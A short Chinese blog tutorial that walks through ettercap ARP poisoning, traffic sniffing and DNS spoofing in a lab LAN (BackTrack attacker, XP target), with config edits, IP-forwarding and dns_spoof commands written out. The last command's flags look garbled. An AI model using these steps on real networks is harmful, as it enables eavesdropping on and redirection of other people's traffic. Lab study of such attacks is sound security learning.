使用ettercap实现局域网arp欺骗+中间人攻击
环境:
网关 ip: 192.168.29.254 mac:
00:50:56:F3:72:9A
攻击主机bt5 ip: 192.168.29.134 mac: 00:0c:29:3e:85:e3
目标主机xp ip: 192.168.29.135
目标主机arp初始缓存表
1.打开/etc/etter.conf文件去掉相应注释信息
# if you use iptables:
#redir_command_on = "iptables -t nat -A
PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat
-D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
使用 iptables
ip转发规则
2.执行echo 1 >
/proc/sys/net/ipv4/ip_forward
开启iptables转发规则 防止被欺骗主机无法访问互联网
3.ettercap
-G
sniff-----unified sniffing 配置网卡
host----scan for host 扫描局域网那个主机
---hosts list 列出主机
目标主机添加到 Target1
网关 添加到 Target2
Mitm---arp poisoning----sniff remote
connections
开始arp欺骗
目标主机新的arp缓存表
网关的mac地址变成攻击主机134的mac地址
此时依旧能上网
欺骗成功!
然后开始嗅探
嗅探攻击成功!
mitm ----stop mitm attack
start---stop sniffing
使用ettercap实现局域网dns欺骗
环境:
网关 ip:
192.168.29.254 mac: 00:50:56:F3:72:9A
攻击主机bt5 ip: 192.168.29.134 mac: 00:0c:29:3e:85:e3
目标主机xp ip: 192.168.29.135
1.修改etter.dns文件
/usr/local/share/ettercap/etter.dns
目标主机初始状态
ettercap
-T -q -i
eth1 -P dns_spoof // //
DNS欺骗整个网络后
ok成功!
先做arp欺骗再做DNS 欺骗会更好
ettercap
-T -Q -i eth0 -M
arp -P -dns_spoof // //







没有评论:
发表评论